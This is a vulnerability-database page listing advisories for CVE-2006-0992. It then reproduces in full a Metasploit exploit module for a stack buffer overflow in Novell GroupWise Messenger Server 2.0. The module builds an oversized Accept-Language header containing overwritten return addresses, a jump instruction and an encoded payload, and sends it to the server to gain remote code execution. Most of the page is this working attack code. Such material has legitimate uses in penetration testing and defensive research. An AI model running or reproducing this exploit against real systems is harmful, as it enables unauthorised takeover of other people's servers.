| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit | 15 Apr 200600:00 | – | zdt | |
| CVE-2006-0092 | 5 Jan 200611:03 | – | attackerkb | |
| CVE-2006-0992 | 20 Sep 201000:00 | – | circl | |
| Novell GroupWise Messenger Accept-Language Header Buffer Overflow (CVE-2006-0992) | 27 Oct 200900:00 | – | checkpoint_advisories | |
| CVE-2006-0992 | 14 Apr 200610:00 | – | cve | |
| CVE-2006-0992 | 14 Apr 200610:00 | – | cvelist | |
| Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit) | 15 Apr 200600:00 | – | exploitdb | |
| Novell Messenger Server 2.0 - Accept-Language Remote Overflow (Metasploit) | 15 Apr 200600:00 | – | exploitpack | |
| Immunity Canvas: GROUPWISE_MESSENGER | 14 Apr 200610:02 | – | canvas | |
| Novell Messenger Server 2.0 Accept-Language Overflow | 14 Apr 200620:22 | – | metasploit |
##
# $Id: novell_messenger_acceptlang.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Novell GroupWise
Messenger Server v2.0. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 16 bytes.
To overwrite the return address on the stack, we must first
pass a memcpy() operation that uses pointers we supply. Due to the
large list of restricted characters and the limitations of the current
encoder modules, very few payloads are usable.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2006-0992'],
['OSVDB', '24617'],
['BID', '17503'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }],
],
'DisclosureDate' => 'Apr 13 2006'))
register_options( [ Opt::RPORT(8300) ], self.class )
end
def exploit
connect
lang = rand_text_alphanumeric(1900)
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
lang[268, 2] = "\xeb\x06"
lang[276, payload.encoded.length] = payload.encoded
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
print_status("Trying target address 0x%.8x..." % target['Rets'][0])
sock.put(res)
sock.close
handler
disconnect
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation